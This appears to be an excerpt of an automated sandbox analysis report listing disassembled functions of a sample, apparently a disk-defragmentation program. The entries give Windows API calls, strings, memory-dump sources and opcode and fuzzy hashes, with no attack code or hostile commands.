                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CaptureEventMessageMouseReleaseSendTrack
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 3622949717-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: 0839e7c7c7d8c9402484c13060e54e3869cf2a4a1aa44a0847cf5f14f67a6ab6
                                                                                                                                                                                                                                                                                    • Instruction ID: 456561867f921ab06e727ae592dfca2a3a58b3b413725f8460958233fe91f338
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0839e7c7c7d8c9402484c13060e54e3869cf2a4a1aa44a0847cf5f14f67a6ab6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B012C705087019FD320DF38D849B5BBBE4BB48718F108A2EF49992290E7B49584CF96
                                                                                                                                                                                                                                                                                    Function 00418A10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00418A33
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00418A3F
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00002727,00000000,00000000), ref: 00418A57
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Parent$MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 2251359880-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: 0627b2b28fd14ab22fc302f47fdf8d037d2ddcb8f263ad73e8dfdf44008453ba
                                                                                                                                                                                                                                                                                    • Instruction ID: e214ceb953b926337bbb5e3aa2410105eb18bd81ccfae75be166400476811563
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0627b2b28fd14ab22fc302f47fdf8d037d2ddcb8f263ad73e8dfdf44008453ba
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DEF03AB9504210AFC300EB64DD89E5BBBA8FF98710F04CA5EF58C9B241D674E845CFA2
                                                                                                                                                                                                                                                                                    Function 004150A0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,00415169), ref: 004150B0
                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 004150C1
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ImageList_Draw), ref: 004150DB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                    • String ID: ImageList_Draw
                                                                                                                                                                                                                                                                                    • API String ID: 310444273-2074868843
                                                                                                                                                                                                                                                                                    • Opcode ID: c2548a7b991ba7467d3f124a8d35b83a44c462a32142ecac1e07a96c10e5a41a
                                                                                                                                                                                                                                                                                    • Instruction ID: 64c332f81b35f2aaac3873e7666c404af8577304093a8f0924de00557a4645c6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2548a7b991ba7467d3f124a8d35b83a44c462a32142ecac1e07a96c10e5a41a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62F0D474601B01CFD7608FA9D988A43BBE4BB58715B50C82EE59AC3A00D778F480CF04
                                                                                                                                                                                                                                                                                    Function 00415240 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,00415319,?,?,BB40E64E,?,?,00000000,BB40E64E,?,BB40E64E,?,00000000,00000000), ref: 00415253
                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00415264
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ImageList_GetImageInfo), ref: 0041527E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                    • String ID: ImageList_GetImageInfo
                                                                                                                                                                                                                                                                                    • API String ID: 310444273-158344479
                                                                                                                                                                                                                                                                                    • Opcode ID: 631ada8aa74ce3b6fe86c1b860eda6107006effdbef0132884d037a0fc17c542
                                                                                                                                                                                                                                                                                    • Instruction ID: f55cdba9153e0e1c980a4fac1fe1aa85c7dcce68075fab81bff91a96374b76ea
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 631ada8aa74ce3b6fe86c1b860eda6107006effdbef0132884d037a0fc17c542
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EF0B275A00B41DFDB208FB8D848B82B7E4AB58715F00C82EA5AEC3611D738E480CF14
                                                                                                                                                                                                                                                                                    Function 004153C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,00415489,?,?,BB40E64E,?,?,00000000,004070E8,?,BB40E64E,?,00000000,00000000), ref: 004153D0
                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 004153E1
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ImageList_GetImageCount), ref: 004153FB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • ImageList_GetImageCount, xrefs: 004153F5
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                    • String ID: ImageList_GetImageCount
                                                                                                                                                                                                                                                                                    • API String ID: 310444273-4246500564
                                                                                                                                                                                                                                                                                    • Opcode ID: dc0ca7fa63d95de86685858bef82a952b7d7d020cd01d86cad7104e1fbda7d34
                                                                                                                                                                                                                                                                                    • Instruction ID: 982047e8d717f41167e3cd9be7dffe01ffe3abe97b222393831f80d9b05f459f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc0ca7fa63d95de86685858bef82a952b7d7d020cd01d86cad7104e1fbda7d34
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08F07475601B45CFD7208F68D948A87B7E4FB58715B40892EE5AEC3A51D778E880CB08
                                                                                                                                                                                                                                                                                    Function 00403D90 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,00403E46,?,?,BB40E64E), ref: 00403DA0
                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00403DB1
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ImageList_AddMasked), ref: 00403DCB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                    • String ID: ImageList_AddMasked
                                                                                                                                                                                                                                                                                    • API String ID: 310444273-822293376
                                                                                                                                                                                                                                                                                    • Opcode ID: 2cef274448d629194f45eaed383d3ce2d55fe80bf2e66e2031492a90ae4c9555
                                                                                                                                                                                                                                                                                    • Instruction ID: f86be7005d8cc87f643f266e3e9cbb46ccc5d3431ffdeeb8f838823e3b4bd8b2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cef274448d629194f45eaed383d3ce2d55fe80bf2e66e2031492a90ae4c9555
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06F06275611B019FDB209F68D948B06BBF8AF18B15B40883DA5AAD3A55D638E540CB04
                                                                                                                                                                                                                                                                                    Function 00423E70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000040), ref: 00423E73
                                                                                                                                                                                                                                                                                    • SetPriorityClass.KERNEL32(00000000), ref: 00423E7A
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClassCurrentPriorityProcess
                                                                                                                                                                                                                                                                                    • String ID: DiskDefrag$Priority
                                                                                                                                                                                                                                                                                    • API String ID: 1822496659-2550450721
                                                                                                                                                                                                                                                                                    • Opcode ID: 4fd6964c920d56df250ae9ab2acb6b08c2f321825b7161079fb8931e388946b9
                                                                                                                                                                                                                                                                                    • Instruction ID: 65e6db7a757ac2f859af6c567d4dd87af2ab39161d08e9a40c4738524f0132bc
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4fd6964c920d56df250ae9ab2acb6b08c2f321825b7161079fb8931e388946b9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3D05BB1580300BFE2006B90CC4EF553654EB00705F504419BB09950E2C6F55188C7AE
                                                                                                                                                                                                                                                                                    Function 00423E30 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000020), ref: 00423E33
                                                                                                                                                                                                                                                                                    • SetPriorityClass.KERNEL32(00000000), ref: 00423E3A
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClassCurrentPriorityProcess
                                                                                                                                                                                                                                                                                    • String ID: DiskDefrag$Priority
                                                                                                                                                                                                                                                                                    • API String ID: 1822496659-2550450721
                                                                                                                                                                                                                                                                                    • Opcode ID: 127201b981698b300859cc31292a0172134846cda05812359d7de4f29bee327f
                                                                                                                                                                                                                                                                                    • Instruction ID: 0765593b2bd4a548dc4285e73e255d63b39630105a75dc21cbbf118713a2a5a8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 127201b981698b300859cc31292a0172134846cda05812359d7de4f29bee327f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DD05B71580300BBE1006B90CC4EF553658EB00705F50441DBB09950E2C6F45188C76A
                                                                                                                                                                                                                                                                                    Function 00423EB0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000080), ref: 00423EB6
                                                                                                                                                                                                                                                                                    • SetPriorityClass.KERNEL32(00000000), ref: 00423EBD
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClassCurrentPriorityProcess
                                                                                                                                                                                                                                                                                    • String ID: DiskDefrag$Priority
                                                                                                                                                                                                                                                                                    • API String ID: 1822496659-2550450721
                                                                                                                                                                                                                                                                                    • Opcode ID: 08ddfa592c1efdcbccc132c313bf1a44a42ddabc710bc291cfdf7ca59a51bf9a
                                                                                                                                                                                                                                                                                    • Instruction ID: cd9b91bb96566d5ac382291ffc385f6ffd504ff47ee525bf2600b2da5630117b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08ddfa592c1efdcbccc132c313bf1a44a42ddabc710bc291cfdf7ca59a51bf9a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8D05EB1680301BFE200ABD0CC4EF5A3668EB00B05F90881DFB09950E2CAF45188CBAA
                                                                                                                                                                                                                                                                                    Function 005FE5EA Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000003.2342650370.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_3_5d0000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 471a6d175e438b999421d817673712101ebc98b14ca97b5bbdd216f1f1212e26
                                                                                                                                                                                                                                                                                    • Instruction ID: a4aa5fe1afe6373b8f220277e30d33a61fd8c1e725b86ca142f017733e7708a6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 471a6d175e438b999421d817673712101ebc98b14ca97b5bbdd216f1f1212e26
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9851E27260124EAFDB289F10E946B7A7FA5FF94310F14452DEA06872B1E739EC41CB90
                                                                                                                                                                                                                                                                                    Function 0042C850 Relevance: 6.1, APIs: 4, Instructions: 143windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130A,00000000,?), ref: 0042C87E
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0042C88F
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130A,00000000,?), ref: 0042C8C7
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0042C8D2
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClientMessageRectSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 166717107-0
                                                                                                                                                                                                                                                                                    • Opcode ID: b63bd0a3e2817953073069a49dd37508e5c619b6a8f1caab7bdc8737ebf16daf
                                                                                                                                                                                                                                                                                    • Instruction ID: 1ae2c4f83a303b8bce0181d8b555b548ed397ea70dfa58a9d15d9eacc3878f9d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b63bd0a3e2817953073069a49dd37508e5c619b6a8f1caab7bdc8737ebf16daf
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC511AB1204301AFD714DE28CD85FABB7EAFBC4704F008A1DF99953694DBB0AD49CA65
                                                                                                                                                                                                                                                                                    Function 00451F00 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
